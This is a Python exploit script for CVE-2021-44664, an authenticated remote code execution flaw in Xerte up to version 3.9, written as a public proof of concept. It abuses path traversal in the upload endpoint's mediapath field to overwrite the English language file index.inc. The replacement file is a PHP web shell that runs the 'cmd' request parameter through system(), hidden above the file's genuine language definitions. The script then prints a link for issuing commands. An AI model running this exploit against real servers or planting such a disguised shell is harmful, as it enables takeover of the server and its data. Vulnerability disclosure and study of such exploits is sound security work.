Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)

# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip
# Version: up until version 3.9
# Tested on: Windows 10 XAMP 
# CVE : CVE-2021-44664

# This PoC assumes guest login is enabled and the en-GB langues files are used. 
# This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell.
# Vulnerable url: https://<host>/website_code/php/import/fileupload.php
# The mediapath variable can be used to set the destination of the uploaded.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota

import requests
import re

xerte_base_url = "http://127.0.0.1"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.

with requests.Session() as session:
    # Get a PHP session ID
    if not php_session_id:
        session.get(xerte_base_url) 
    else:
        session.cookies.set("PHPSESSID", php_session_id)

     # Use a default template
    data = {
        'tutorialid': 'Nottingham',
        'templatename': 'Nottingham',
        'tutorialname': 'exploit',
        'folder_id': ''
    }

    # Create a new project in order to find the install path
    template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)

    # Find template ID
    data = {
        'template_id': re.findall('(\d+)', template_id.text)[0]
    }

    # Find the install path:
    install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
    install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0]

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3',
        'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978',
       }

    # index.inc file
    data = \
    '''-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc"
Content-Type: application/octet-stream

<?php
if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }
/**
 *
 * index.php english language file
 *
 * @author Patrick Lockley
 * @version 1.0
 * @copyright Pat Lockley
 * @package
 */

define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");

define("INDEX_USERNAME_EMPTY", "Please enter your username");

define("INDEX_PASSWORD_EMPTY", "Please enter your password");

define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");

define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");

define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");

define("INDEX_LOGIN", "login area");

define("INDEX_USERNAME", "Username");

define("INDEX_PASSWORD", "Password");

define("INDEX_HELP_TITLE", "Getting Started");

define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website.");

define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");

define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");

define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");

define("INDEX_WORKSPACE_TITLE","My Projects");

define("INDEX_CREATE","Project Templates");

define("INDEX_DETAILS","Project Details");

define("INDEX_SORT","Sort");

define("INDEX_SEARCH","Search");

define("INDEX_SORT_A","Alphabetical A-Z");

define("INDEX_SORT_Z","Alphabetical Z-A");

define("INDEX_SORT_NEW","Age (New to Old)");

define("INDEX_SORT_OLD","Age (Old to New)");

define("INDEX_LOG_OUT","Log out");

define("INDEX_LOGGED_IN_AS","Logged in as");

define("INDEX_BUTTON_LOGIN","Login");

define("INDEX_BUTTON_LOGOUT","Logout");

define("INDEX_BUTTON_PROPERTIES","Properties");

define("INDEX_BUTTON_EDIT","Edit");

define("INDEX_BUTTON_PREVIEW", "Preview");

define("INDEX_BUTTON_SORT", "Sort");

define("INDEX_BUTTON_NEWFOLDER", "New Folder");

define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create");

define("INDEX_BUTTON_DELETE", "Delete");

define("INDEX_BUTTON_DUPLICATE", "Duplicate");

define("INDEX_BUTTON_PUBLISH", "Publish");

define("INDEX_BUTTON_CANCEL", "Cancel");

define("INDEX_BUTTON_SAVE", "Save");

define("INDEX_XAPI_DASHBOARD_FROM", "From:");

define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:");

define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");

define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");

define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");

define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");

define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");

define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");

define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");

define("INDEX_XAPI_DASHBOARD_PRINT", "Print");
\r
\r
-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="mediapath"

''' \
    + install_path \
    + '''../../../languages/en-GB/
-----------------------------170331411929658976061651588978--\r
'''

    # Overwrite index.inc file
    response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data)
    print('Installation path: ' + install_path)
    print(response.text)
    if "success" in response.text:
        print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')